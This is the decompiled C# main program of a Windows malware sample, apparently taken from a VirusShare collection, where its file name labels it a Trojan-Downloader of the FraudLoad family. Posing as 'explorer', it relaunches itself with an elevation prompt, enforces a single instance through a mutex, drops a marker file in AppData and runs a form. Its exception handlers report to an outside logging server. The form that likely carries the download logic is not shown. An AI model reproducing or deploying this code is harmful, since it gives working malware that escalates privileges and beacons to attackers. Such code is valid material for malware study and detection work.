// Decompiled with JetBrains decompiler
// Type: mute.Program
// Assembly: explorer, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 772D6407-3F7F-4A01-A630-EF8C6D749DE8
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00002-msil\Trojan-Downloader.Win32.FraudLoad.yjmx-bf19859422e8892dcad392d861505005b20bd4fdd2f7d81fdd3c89ab387e68c8.exe

using System;
using System.Diagnostics;
using System.IO;
using System.Net;
using System.Runtime.InteropServices;
using System.Security.Principal;
using System.Threading;
using System.Web;
using System.Windows.Forms;

namespace mute
{
  internal static class Program
  {
    [DllImport("kernel32")]
    private static extern int SetUnhandledExceptionFilter(Program.CallBack cb);

    public static int newexceptionfilter(ref long a) => 1;

    [DllImport("kernel32.dll", SetLastError = true)]
    [return: MarshalAs(UnmanagedType.Bool)]
    private static extern bool TerminateProcess(IntPtr hProcess, uint uExitCode);

    public static bool IsAdministrator()
    {
      WindowsIdentity current = WindowsIdentity.GetCurrent();
      return null != current && new WindowsPrincipal(current).IsInRole(WindowsBuiltInRole.Administrator);
    }

    [STAThread]
    private static void Main()
    {
      if (Path.GetDirectoryName(Application.ExecutablePath) != Application.UserAppDataPath && !Program.IsAdministrator())
      {
        Process.Start(new ProcessStartInfo()
        {
          FileName = Application.ExecutablePath,
          Verb = "runas"
        });
      }
      else
      {
        Thread.Sleep(5000);
        bool createdNew;
        Mutex mutex = new Mutex(true, Application.ProductName, out createdNew);
        if (!createdNew)
          return;
        System.IO.File.WriteAllText(Path.Combine(Application.UserAppDataPath, "hide.txt"), "empty");
        Application.EnableVisualStyles();
        Application.SetCompatibleTextRenderingDefault(false);
        try
        {
          Application.Run((Form) new Form1());
        }
        catch (Exception ex1)
        {
          string str = string.Format("Unhandled Exception Raised:{0}", (object) ex1.Message);
          WebClient webClient = new WebClient();
          string address = string.Format("http://isthisactuallyadomain.info/log.php?user={0}&memo={1}&msg={2}", (object) 4, (object) "634247432852901340", (object) HttpUtility.UrlEncode(str));
          try
          {
            webClient.DownloadString(address);
          }
          catch (Exception ex2)
          {
            int num = (int) MessageBox.Show(str);
          }
        }
        finally
        {
          mutex.ReleaseMutex();
        }
      }
    }

    private static void ThreadHandler(object sender, ThreadExceptionEventArgs args)
    {
      string str = string.Format("Unhandled Exception Raised:{0}", (object) args.Exception.Message);
      WebClient webClient = new WebClient();
      string address = string.Format("http://isthisactuallyadomain.info/log.php?user={0}&memo={1}&msg={2}", (object) 4, (object) "634247432852901340", (object) HttpUtility.UrlEncode(str));
      try
      {
        webClient.DownloadString(address);
      }
      catch (Exception ex)
      {
        int num = (int) MessageBox.Show(str);
      }
      Application.Exit();
    }

    private static void MyHandler(object sender, UnhandledExceptionEventArgs args)
    {
      string str = string.Format("Unhandled Exception Raised:{0}", (object) ((Exception) args.ExceptionObject).Message);
      WebClient webClient = new WebClient();
      string address = string.Format("http://isthisactuallyadomain.info/log.php?user={0}&memo={1}&msg={2}", (object) 4, (object) "634247432852901340", (object) HttpUtility.UrlEncode(str));
      try
      {
        webClient.DownloadString(address);
      }
      catch (Exception ex)
      {
        int num = (int) MessageBox.Show(str);
      }
      Application.Exit();
    }

    public delegate int CallBack(ref long a);
  }
}